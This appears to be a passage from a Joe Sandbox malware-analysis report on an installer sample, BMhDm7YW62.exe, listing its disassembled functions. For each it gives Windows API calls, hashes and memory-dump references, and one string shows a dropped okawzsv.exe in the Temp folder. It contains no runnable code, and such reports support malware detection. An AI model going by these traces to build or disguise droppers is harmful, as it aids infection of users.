                                                                                                                        • Instruction Fuzzy Hash: D6B01231544200BFDB214F00DF06F057B21B79C701F208030B340380F082712430EB1E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Non-executed Functions

                                                                                                                        Function 00404FC2 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278windowclipboardmemoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetDlgItem.USER32(?,00000403), ref: 00405021
                                                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 00405030
                                                                                                                        • GetClientRect.USER32(?,?), ref: 0040506D
                                                                                                                        • GetSystemMetrics.USER32(00000015), ref: 00405075
                                                                                                                        • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00405096
                                                                                                                        • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004050A7
                                                                                                                        • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 004050BA
                                                                                                                        • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 004050C8
                                                                                                                        • SendMessageA.USER32(?,00001024,00000000,?), ref: 004050DB
                                                                                                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004050FD
                                                                                                                        • ShowWindow.USER32(?,00000008), ref: 00405111
                                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 00405132
                                                                                                                        • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405142
                                                                                                                        • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040515B
                                                                                                                        • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 00405167
                                                                                                                        • GetDlgItem.USER32(?,000003F8), ref: 0040503F
                                                                                                                          • Part of subcall function 00403E89: SendMessageA.USER32(00000028,?,00000001,00403CBA), ref: 00403E97
                                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 00405184
                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_00004F56,00000000), ref: 00405192
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00405199
                                                                                                                        • ShowWindow.USER32(00000000), ref: 004051BD
                                                                                                                        • ShowWindow.USER32(00000000,00000008), ref: 004051C2
                                                                                                                        • ShowWindow.USER32(00000008), ref: 00405209
                                                                                                                        • SendMessageA.USER32(00000000,00001004,00000000,00000000), ref: 0040523B
                                                                                                                        • CreatePopupMenu.USER32 ref: 0040524C
                                                                                                                        • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405261
                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00405274
                                                                                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405298
                                                                                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004052D3
                                                                                                                        • OpenClipboard.USER32(00000000), ref: 004052E3
                                                                                                                        • EmptyClipboard.USER32 ref: 004052E9
                                                                                                                        • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004052F2
                                                                                                                        • GlobalLock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004052FC
                                                                                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405310
                                                                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405328
                                                                                                                        • SetClipboardData.USER32(00000001,00000000), ref: 00405333
                                                                                                                        • CloseClipboard.USER32 ref: 00405339
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                        • String ID: {
                                                                                                                        • API String ID: 590372296-366298937
                                                                                                                        • Opcode ID: 2304b148e9a21fd8fd2dbd7aea04fbfc66f4e7d68f979f8d2529fbafd725d49b
                                                                                                                        • Instruction ID: 6929f331228a41c4e1f6bf5049925f100d3ed94cd800429e98060a15954be78d
                                                                                                                        • Opcode Fuzzy Hash: 2304b148e9a21fd8fd2dbd7aea04fbfc66f4e7d68f979f8d2529fbafd725d49b
                                                                                                                        • Instruction Fuzzy Hash: 6DA13AB1900208BFDB119F60DD89AAE7F79FB44355F00813AFA05BA1A0C7795E41DFA9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004047D3 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478windowmemoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetDlgItem.USER32(?,000003F9), ref: 004047EA
                                                                                                                        • GetDlgItem.USER32(?,00000408), ref: 004047F7
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00000001), ref: 00404843
                                                                                                                        • LoadBitmapA.USER32(0000006E), ref: 00404856
                                                                                                                        • SetWindowLongA.USER32(?,000000FC,00404DD4), ref: 00404870
                                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404884
                                                                                                                        • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404898
                                                                                                                        • SendMessageA.USER32(?,00001109,00000002), ref: 004048AD
                                                                                                                        • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004048B9
                                                                                                                        • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004048CB
                                                                                                                        • DeleteObject.GDI32(?), ref: 004048D0
                                                                                                                        • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004048FB
                                                                                                                        • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404907
                                                                                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 0040499C
                                                                                                                        • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 004049C7
                                                                                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 004049DB
                                                                                                                        • GetWindowLongA.USER32(?,000000F0), ref: 00404A0A
                                                                                                                        • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404A18
                                                                                                                        • ShowWindow.USER32(?,00000005), ref: 00404A29
                                                                                                                        • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404B2C
                                                                                                                        • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404B91
                                                                                                                        • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404BA6
                                                                                                                        • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404BCA
                                                                                                                        • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404BF0
                                                                                                                        • ImageList_Destroy.COMCTL32(?), ref: 00404C05
                                                                                                                        • GlobalFree.KERNEL32(?), ref: 00404C15
                                                                                                                        • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404C85
                                                                                                                        • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404D2E
                                                                                                                        • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404D3D
                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00404D5D
                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 00404DAB
                                                                                                                        • GetDlgItem.USER32(?,000003FE), ref: 00404DB6
                                                                                                                        • ShowWindow.USER32(00000000), ref: 00404DBD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                        • String ID: $M$N
                                                                                                                        • API String ID: 1638840714-813528018
                                                                                                                        • Opcode ID: dd6819aa1443f5cf7d51c2c88bee5c86e1a698ab9de6fee51b1062b3689a5351
                                                                                                                        • Instruction ID: 9a6d62add78faf2b4aa272e1cf177665df16ecedb9a61d3aa4425c18576eb247
                                                                                                                        • Opcode Fuzzy Hash: dd6819aa1443f5cf7d51c2c88bee5c86e1a698ab9de6fee51b1062b3689a5351
                                                                                                                        • Instruction Fuzzy Hash: 8B029DB0E00209AFDB24DF55DD45AAE7BB5EB84315F10817AF610BA2E1C7789A81CF58
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00404292 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 273stringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetDlgItem.USER32(?,000003FB), ref: 004042E1
                                                                                                                        • SetWindowTextA.USER32(00000000,?), ref: 0040430B
                                                                                                                        • SHBrowseForFolderA.SHELL32(?,0041F908,?), ref: 004043BC
                                                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 004043C7
                                                                                                                        • lstrcmpiA.KERNEL32("C:\Users\user\AppData\Local\Temp\okawzsv.exe" ,00420538), ref: 004043F9
                                                                                                                        • lstrcatA.KERNEL32(?,"C:\Users\user\AppData\Local\Temp\okawzsv.exe" ), ref: 00404405
                                                                                                                        • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404417
                                                                                                                          • Part of subcall function 0040543D: GetDlgItemTextA.USER32(?,?,00000400,0040444E), ref: 00405450
                                                                                                                          • Part of subcall function 00405DFA: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\BMhDm7YW62.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030D6,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405E52
                                                                                                                          • Part of subcall function 00405DFA: CharNextA.USER32(?,?,?,00000000), ref: 00405E5F
                                                                                                                          • Part of subcall function 00405DFA: CharNextA.USER32(?,"C:\Users\user\Desktop\BMhDm7YW62.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030D6,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405E64
                                                                                                                          • Part of subcall function 00405DFA: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030D6,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405E74
                                                                                                                        • GetDiskFreeSpaceA.KERNEL32(0041F500,?,?,0000040F,?,0041F500,0041F500,?,00000001,0041F500,?,?,000003FB,?), ref: 004044D5
                                                                                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004044F0
                                                                                                                          • Part of subcall function 00404649: lstrlenA.KERNEL32(00420538,00420538,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404564,000000DF,00000000,00000400,?), ref: 004046E7
                                                                                                                          • Part of subcall function 00404649: wsprintfA.USER32 ref: 004046EF
                                                                                                                          • Part of subcall function 00404649: SetDlgItemTextA.USER32(?,00420538), ref: 00404702
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                        • String ID: "C:\Users\user\AppData\Local\Temp\okawzsv.exe" $A$C:\Users\user\AppData\Local\Temp
                                                                                                                        • API String ID: 2624150263-428732121
                                                                                                                        • Opcode ID: fb58f5be01c1fbab376fe3aca88381438e011d3cf0c95fbb8aa79c4ccef87f62
                                                                                                                        • Instruction ID: cfccd4b73e861dd9bc9b7885d3f414f2f86db1ffcc16c92a650f1104495a78a5
                                                                                                                        • Opcode Fuzzy Hash: fb58f5be01c1fbab376fe3aca88381438e011d3cf0c95fbb8aa79c4ccef87f62
                                                                                                                        • Instruction Fuzzy Hash: EAA17EB1D00218BBDB11AFA5CD41AAFB6B8EF84315F10813BF605B62D1D77C9A418F69
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00402053 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134comCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CoCreateInstance.OLE32(004073F8,?,00000001,004073E8,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020A6
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409408,00000400,?,00000001,004073E8,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402160
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\AppData\Local\Temp, xrefs: 004020DE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharCreateInstanceMultiWide
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                                        • API String ID: 123533781-1116454783
                                                                                                                        • Opcode ID: 089d45c0d23cda86f3d168a15e68d27aa0b28459bfa4feaba1da871340bdcdc6
                                                                                                                        • Instruction ID: c7e9304a010c998f9a7959bd005017a1970e80d3ce8bb7043a01564e87abbd95
                                                                                                                        • Opcode Fuzzy Hash: 089d45c0d23cda86f3d168a15e68d27aa0b28459bfa4feaba1da871340bdcdc6
                                                                                                                        • Instruction Fuzzy Hash: 32416E75A00205BFCB00DFA8CD88E9E7BB5EF49354F204169F905EB2D1CA799C41CB94
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00402671 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402680
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFindFirst
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1974802433-0
                                                                                                                        • Opcode ID: c707d325fcd64eef76be24f413fce74fcf29a9d2c757c0b7f3e21b108dde0476
                                                                                                                        • Instruction ID: c4b8fb32876d586bcf7df686e34757fa561d471cbaf363f6388d0c393702730c
                                                                                                                        • Opcode Fuzzy Hash: c707d325fcd64eef76be24f413fce74fcf29a9d2c757c0b7f3e21b108dde0476
                                                                                                                        • Instruction Fuzzy Hash: 81F0A032A041009ED711EBA49A499EEB7789B11318F60067BE101B21C1C6B859459B2A
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00403F9C Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 204windowstringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404027
                                                                                                                        • GetDlgItem.USER32(00000000,000003E8), ref: 0040403B
                                                                                                                        • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404059
                                                                                                                        • GetSysColor.USER32(?), ref: 0040406A
                                                                                                                        • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404079
                                                                                                                        • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404088
                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00404092
                                                                                                                        • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004040A0
                                                                                                                        • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004040AF
                                                                                                                        • GetDlgItem.USER32(?,0000040A), ref: 00404112
                                                                                                                        • SendMessageA.USER32(00000000), ref: 00404115
                                                                                                                        • GetDlgItem.USER32(?,000003E8), ref: 00404140
                                                                                                                        • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404180
                                                                                                                        • LoadCursorA.USER32(00000000,00007F02), ref: 0040418F
                                                                                                                        • SetCursor.USER32(00000000), ref: 00404198
                                                                                                                        • ShellExecuteA.SHELL32(0000070B,open,.B,00000000,00000000,00000001), ref: 004041AB
                                                                                                                        • LoadCursorA.USER32(00000000,00007F00), ref: 004041B8
                                                                                                                        • SetCursor.USER32(00000000), ref: 004041BB
                                                                                                                        • SendMessageA.USER32(00000111,00000001,00000000), ref: 004041E7
                                                                                                                        • SendMessageA.USER32(00000010,00000000,00000000), ref: 004041FB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                        • String ID: N$open$.B
                                                                                                                        • API String ID: 3615053054-720656042
                                                                                                                        • Opcode ID: 1798247d7b7fc50258c29a0d8842d8596947dcfb78ae24f73fc7e5e40567b794
                                                                                                                        • Instruction ID: d52f05746bbb3f3b1d606d9c91532631e65720296560e4ea5c31ec00add49965
                                                                                                                        • Opcode Fuzzy Hash: 1798247d7b7fc50258c29a0d8842d8596947dcfb78ae24f73fc7e5e40567b794
                                                                                                                        • Instruction Fuzzy Hash: 0161D571A40309BBEB109F60DD45F6A7B69FB54715F108036FB04BA2D1C7B8AA51CF98
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                        • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                        • SetTextColor.GDI32(00000000,?), ref: 00401130
                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                        • DrawTextA.USER32(00000000,jtlkrtaftpgmppuxhth Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                        • String ID: F$jtlkrtaftpgmppuxhth Setup
                                                                                                                        • API String ID: 941294808-2301260693
                                                                                                                        • Opcode ID: cae46454919e7fa79772e51e967b3c1ae0100adcfe078b8b521791772386bd0b
                                                                                                                        • Instruction ID: 81ce27436f0092abe3ce3185f2c65b9207eacd25275343976a1476a18aae1cf1
                                                                                                                        • Opcode Fuzzy Hash: cae46454919e7fa79772e51e967b3c1ae0100adcfe078b8b521791772386bd0b
                                                                                                                        • Instruction Fuzzy Hash: 06418B71804249AFCB058F95DD459AFBBB9FF44315F00802AF961AA2A0C738EA51DFA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004058E6 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144filememoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00405F28: GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                                                                                                          • Part of subcall function 00405F28: GetProcAddress.KERNEL32(00000000,?), ref: 00405F55
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000002,?,00000000,?,?,0040567B,?,00000000,000000F1,?), ref: 00405933
                                                                                                                        • GetShortPathNameA.KERNEL32(?,004226C8,00000400), ref: 0040593C
                                                                                                                        • GetShortPathNameA.KERNEL32(00000000,00422140,00000400), ref: 00405959
                                                                                                                        • wsprintfA.USER32 ref: 00405977
                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,00422140,C0000000,00000004,00422140,?,?,?,00000000,000000F1,?), ref: 004059B2
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004059C1
                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 004059D7
                                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421D40,00000000,-0000000A,004093E4,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405A1D
                                                                                                                        • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405A2F
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00405A36
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405A3D
                                                                                                                          • Part of subcall function 004057E4: lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057EB
                                                                                                                          • Part of subcall function 004057E4: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeModulePointerProcReadSizeWritewsprintf
